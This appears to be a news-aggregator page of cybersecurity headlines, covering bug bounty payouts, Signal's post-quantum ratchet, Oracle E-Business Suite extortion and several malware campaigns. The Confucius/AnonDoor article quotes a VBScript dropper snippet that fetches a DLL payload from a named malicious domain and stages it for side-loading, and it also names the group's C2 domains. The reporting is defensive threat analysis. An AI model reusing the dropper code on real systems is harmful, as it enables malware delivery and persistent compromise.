1010.cx

  • HackerOne Paid $81 In Bug Bounty With Emergence of Bionic Hackers

    ·

    , ,

    HackerOne, a leading platform in offensive security, announced it has paid out a total of $81 million in bug bounties to its global community of white-hat hackers over the past year.

    This figure, detailed in the company’s 9th annual Hacker-Powered Security Report, marks a 13% increase from the previous year, highlighting the growing reliance on crowdsourced security to defend against evolving cyber threats. The report covers the period from July 1, 2024, to June 30, 2025.

    The findings underscore a significant return on investment for organizations utilizing bug bounty programs. For every dollar spent on bounties, companies saved an average of $15, culminating in an estimated $3 billion in mitigated financial losses from potential breaches.

    This 15x return demonstrates the financial efficacy of leveraging ethical hackers to identify and remediate vulnerabilities before they can be exploited by malicious actors.

    Emergence of “Bionic Hackers”

    A central theme of the 2025 report is the emergence of the “bionic hacker” security researchers who extend their expertise with artificial intelligence.

    This synergy of human creativity and AI-driven automation is reshaping the security landscape. According to HackerOne, there has been a 210% surge in valid AI-related vulnerability reports since 2024, with researchers increasingly focused on testing AI and machine learning systems.

    The report indicates that 67% of surveyed researchers now use AI or automation tools to accelerate reconnaissance and testing. The platform has also seen the advent of “hackbots,” autonomous AI agents that have submitted 560 valid reports, primarily identifying surface-level flaws like Cross-Site Scripting (XSS).

    While human ingenuity remains crucial for uncovering complex business logic and multi-step exploits, AI is proving to be a powerful force multiplier.

    The distribution of the $81 million in bounties reveals key industry priorities and risk areas. The technology sector, particularly computer software and internet services, led in total payouts.

    Computer Software programs accounted for over $9.7 million in bounties, while the top 10 programs on the platform paid out a combined $21.6 million.

    Vulnerability trends show a shift in focus. While payouts for common bugs like XSS are declining, rewards for more critical issues such as Improper Access Control (IAC) and Insecure Direct Object Reference (IDOR) are on the rise.

    IDOR-related rewards increased by 23% and valid reports grew by 29%, signaling that attackers and researchers are concentrating on authorization and access control weaknesses.

    The report emphasizes that the future of cybersecurity belongs to organizations that can effectively combine human expertise with AI-powered tools to stay ahead of adversaries in a rapidly changing threat environment.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post HackerOne Paid $81 In Bug Bounty With Emergence of Bionic Hackers appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Threat Actors Imitate Popular Brands in New Malware Distribution Campaigns

    ·

    , ,

    In a sophisticated resurgence of smishing campaigns, cybercriminals have begun embedding trusted brand names into deceptive URLs and group messaging threads to lure unsuspecting users into downloading malware. By inserting a familiar company name before the “@” symbol in links, attackers exploit users’ trust in established entities such as FedEx and Microsoft. Coupled with deceptively […]

    The post Threat Actors Imitate Popular Brands in New Malware Distribution Campaigns appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Confucius Hacker Group Attacking Weaponizing Documents to Compromised Windows Systems With AnonDoor Malware

    ·

    , ,

    The Confucius hacker group, active since 2013, has recently escalated its operations by weaponizing malicious Office documents to compromise Windows endpoints with a new Python-based backdoor, dubbed AnonDoor.

    Historically known for deploying document stealers such as WooperStealer, the threat actor has now shifted to a sophisticated multi-stage infection chain that leverages OLE-embedded scripts, VBScript droppers, PowerShell loaders, and scheduled tasks to achieve persistence and evade detection.

    This evolution underscores the group’s commitment to refining its tradecraft and targeting high-value information across government and defense organizations in South Asia.

    Confucius’ activities (Source – Fortinet)

    Initial access is most commonly achieved through spear-phishing campaigns that deliver corrupted PPSX or DOCX attachments.

    When unsuspecting users open these documents, they encounter a “Corrupted Page” prompt that conceals an embedded OLE object.

    This object triggers a background fetch of a secondary document, mango44NX.doc, from a remote server.

    Fortinet researchers noted that the CMD stub within slide1.xml.rels initiates a VBScript dropper hosted at greenxeonsr.info, marking the first deployment of AnonDoor in this campaign.

    Upon execution, the VBScript dropper performs the following steps: it creates an MSXML2.XMLHTTP object to download a raw DLL payload, writes the binary to %LocalAppData%\Mapistub.dll, and then stages execution via DLL side-loading.

    The dropper also copies a legitimate executable to %AppData%\Swom.exe and writes a registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run to ensure the side-loaded DLL is launched on each login.

    Download DLL (Source – Fortinet)

    This strategy not only conceals the malicious binary within trusted processes but also provides robust persistence without generating conspicuous artifacts.

    Infection Mechanism

    The infection mechanism centers on leveraging a malicious Office payload to seamlessly introduce AnonDoor.

    First, the document’s OLE object references an external VBScript hosted on greenxeonsr.info.

    The script snippet below illustrates how the dropper leverages ADODB.Stream to save the downloaded bytes as a DLL:-

    Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.Open "GET", "https://greenxeonsr.info/Jsdfwejhrg.rko", False
objXMLHTTP.Send
Set objStream = CreateObject("ADODB.Stream")
objStream.Type = 1 ' Binary
objStream.Open
objStream.Write objXMLHTTP.responseBody
objStream.SaveToFile WScript.Network.UserName & "\Mapistub.dll", 2
objStream.Close

    Once the DLL is in place, the dropper invokes a reconstructed ShellExecute call to launch Swom.exe, which side-loads the DLL into memory.

    The DLL subsequently reaches out to multiple C2 domains—cornfieldblue.info and hauntedfishtree.info—to retrieve further payloads, including the WooperStealer module and additional configuration files.

    This multi-layered approach ensures that even if one stage is detected, subsequent payloads can be dynamically fetched, analyzed, and replaced, complicating forensic investigations.

    By chaining document-based exploitation with obfuscated scripting and DLL side-loading, Confucius demonstrates advanced operational security and resilience against endpoint defenses.

    Defensive teams should prioritize monitoring for anomalous OLE object behaviour, unexpected registry modifications, and unusual DLL loads within Office processes.

    Integrating heuristics that detect atypical stream writes to user directories and enforcing strict network segmentation can help mitigate this emerging threat.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Confucius Hacker Group Attacking Weaponizing Documents to Compromised Windows Systems With AnonDoor Malware appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Signal Enhances Security With New Hybrid PQ Ratchet to Compact Quantum Computing Threats

    ·

    ,

    Signal has announced a groundbreaking advancement in secure messaging with the introduction of the Sparse Post Quantum Ratchet (SPQR), a revolutionary cryptographic enhancement designed to protect against future quantum computing threats. 

    This latest security upgrade represents a significant milestone in the evolution of the Signal Protocol, which secures billions of daily communications worldwide.

    The new security enhancement introduces the Triple Ratchet protocol, which combines Signal’s proven Double Ratchet mechanism with the quantum-resistant SPQR system. 

    This hybrid approach ensures that users maintain existing security guarantees while gaining protection against potential quantum computer attacks that could compromise traditional cryptographic methods.

    The SPQR implementation utilizes the ML-KEM 768 (Machine Learning Key Encapsulation Mechanism), a NIST-standardized quantum-safe algorithm that generates robust encryption keys resistant to both classical and quantum computational attacks.

    Signal Enhances Security with Hybrid PQ Ratchet

    The system employs Encapsulation Keys (EK) of 1,184 bytes and Ciphertext (CT) of 1,088 bytes, significantly larger than the 32-byte keys used in traditional ECDH (Elliptic Curve Diffie-Hellman) implementations.

    To address bandwidth concerns, Signal engineers developed an innovative solution using erasure codes for efficient data transmission. 

    This approach breaks large cryptographic keys into smaller chunks, allowing any subset of transmitted chunks to reconstruct the original key, making the system resistant to message loss and malicious interference.

    The SPQR protocol maintains Signal’s core security principles of Forward Secrecy (FS) and Post-Compromise Security (PCS). 

    Forward Secrecy protects past messages from future compromises, while Post-Compromise Security ensures future messages remain secure even if current keys are breached. 

    The quantum-safe implementation extends these protections against attacks from sufficiently powerful quantum computers.

    The system addresses harvest-now-decrypt-later attacks, where adversaries collect encrypted communications today with the intent to decrypt them once quantum computers become available. 

    By implementing PQXDH (Post-Quantum Extended Diffie-Hellman) for session establishment and SPQR for ongoing protection, Signal creates a comprehensive quantum-resistant communication framework.

    Signal’s implementation includes sophisticated state machine logic to coordinate key exchanges between communicating parties. 

    The protocol efficiently manages the exchange of large cryptographic keys through a carefully orchestrated process involving ML-KEM Braid operations, ensuring optimal use of available bandwidth while maintaining security guarantees.

    The rollout strategy incorporates backward compatibility, allowing gradual deployment across Signal’s user base without disrupting existing conversations. 

    The system can automatically downgrade to traditional encryption when communicating with devices that haven’t yet received the update, while preventing malicious downgrade attacks through cryptographic authentication mechanisms.

    Signal employed rigorous formal verification processes using ProVerif and F* verification languages to mathematically prove the protocol’s security properties. 

    The Rust implementation undergoes continuous verification through the hax translation system, ensuring code correctness and preventing runtime failures. 

    This comprehensive approach to security validation demonstrates Signal’s commitment to providing mathematically proven protection for user communications in the emerging quantum computing era.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Signal Enhances Security With New Hybrid PQ Ratchet to Compact Quantum Computing Threats appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Oracle Confirms Hackers Target E-Business Suite Data in Extortion Campaigns

    ·

    , ,

    Oracle has confirmed that a group of hackers stole data from its E-Business Suite (EBS) applications and is using the information in extortion campaigns. The company warns that these attackers exploited vulnerabilities already fixed in the July 2025 Critical Patch Update (CPU). Oracle strongly urges all customers to apply the latest CPU immediately to defend […]

    The post Oracle Confirms Hackers Target E-Business Suite Data in Extortion Campaigns appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Oracle Confirms that Hackers Targeting E-Business Suite Data With Extortion Emails

    ·

    , , ,

    Oracle Corporation has officially acknowledged that cybercriminals are targeting customers of its E-Business Suite (EBS) platform through sophisticated extortion campaigns

    The company’s Chief Security Officer, Rob Duhart, confirmed that hackers have been exploiting previously identified vulnerabilities that were addressed in Oracle’s July 2025 Critical Patch Update (CPU). 

    This latest security incident underscores the persistent threat landscape facing enterprise applications and highlights the critical importance of timely security patch deployment.

    Oracle E-Business Suite Customers Targeted

    Bloomberg stated that the cybercriminal group, claiming affiliation with the notorious Cl0p ransomware organization, has been conducting a highly coordinated attack campaign against Oracle E-Business Suite installations. 

    According to cybersecurity firm Halcyon, the threat actors have demonstrated sophisticated tactics, techniques, and procedures (TTPs) by compromising user email accounts and exploiting default password-reset functions to obtain valid credentials for internet-facing Oracle EBS portals.

    The attackers have provided victims with proof of compromise, including detailed screenshots and file tree structures demonstrating unauthorized access to sensitive corporate data. 

    In at least one documented case, the extortion demands reached as high as $50 million, representing one of the largest ransom demands observed in recent cybercriminal campaigns. 

    The threat actors began distributing extortion emails on or before September 29, 2025, using hundreds of compromised third-party email accounts to evade detection mechanisms.

    Oracle’s E-Business Suite, which manages critical enterprise functions including financial management, supply chain operations, and customer relationship management (CRM), has become an attractive target due to its extensive deployment across large organizations. 

    The vulnerability exploitation appears to leverage previously identified security flaws that were patched in Oracle’s July 2025 Critical Patch Update, specifically addressing CVE identifiers related to authentication bypass and privilege escalation attacks.

    Genevieve Stark, head of cybercrime at Google Threat Intelligence Group, confirmed that the extortion emails contain contact details matching those listed on Cl0p’s official dark web infrastructure. 

    The threat group’s modus operandi includes characteristic grammatical errors and linguistic patterns consistent with previous Cl0p operations, including their infamous 2023 MOVEit campaign that compromised over 3,000 organizations in the United States and 8,000 globally.

    Oracle has reiterated its strong recommendation for the immediate deployment of the latest Critical Patch Updates, emphasizing that organizations maintaining current security patch levels significantly reduce their attack surface. 

    The company’s security advisory specifically references the July 2025 CPU, which addressed multiple high-severity vulnerabilities with CVSS scores ranging from 7.5 to 9.8, including remote code execution (RCE) and SQL injection attack vectors. 

    Organizations experiencing similar extortion attempts are advised to contact Oracle Support immediately while implementing incident response procedures, including network segmentation and the preservation of forensic data.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Oracle Confirms that Hackers Targeting E-Business Suite Data With Extortion Emails appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Rhadamanthys Stealer Offered on Dark Web for $299–$499

    ·

    , , ,

    A new offering named Rhadamanthys, a sophisticated information stealer, has surfaced for sale on underground marketplaces, with subscription packages starting at $299 and reaching up to $499 per month. Marked by its polished branding and tiered pricing structure, the malware positions itself as a professional-grade service rather than a casual tool for novice cybercriminals. Since […]

    The post Rhadamanthys Stealer Offered on Dark Web for $299–$499 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Signal Introduces Hybrid Post-Quantum Ratchet to Strengthen Security

    ·

    ,

    Signal, the popular end-to-end encrypted messaging platform, has announced a groundbreaking advancement in cryptographic security with the introduction of the Sparse Post Quantum Ratchet (SPQR). This innovative protocol represents a significant leap forward in protecting user communications against emerging quantum computing threats while maintaining all existing security guarantees. Revolutionary Triple Ratchet Protocol Debuts The new […]

    The post Signal Introduces Hybrid Post-Quantum Ratchet to Strengthen Security appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Hundreds of Free VPN Apps Expose Android and iOS Users’ Personal Data

    ·

    , , , , ,

    Virtual Private Networks (VPNs) are trusted by millions to protect privacy, secure communications, and enable remote access on their mobile devices. But what if the very apps designed to safeguard your data are riddled with dangerous security flaws that expose the exact information they promise to protect? A comprehensive security and privacy analysis by Zimperium […]

    The post Hundreds of Free VPN Apps Expose Android and iOS Users’ Personal Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Microsoft Defender Bug Sparks Numerous False BIOS Security Alerts

    ·

    , , ,

    Microsoft Defender for Endpoint users, particularly those with Dell devices, are experiencing a widespread issue with false Basic Input/Output System (BIOS) security alerts due to a critical software bug. The problem, which surfaced on October 2, 2025, has prompted Microsoft to issue a service degradation notice affecting multiple organizations worldwide. Widespread False Alert Campaign The […]

    The post Microsoft Defender Bug Sparks Numerous False BIOS Security Alerts appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶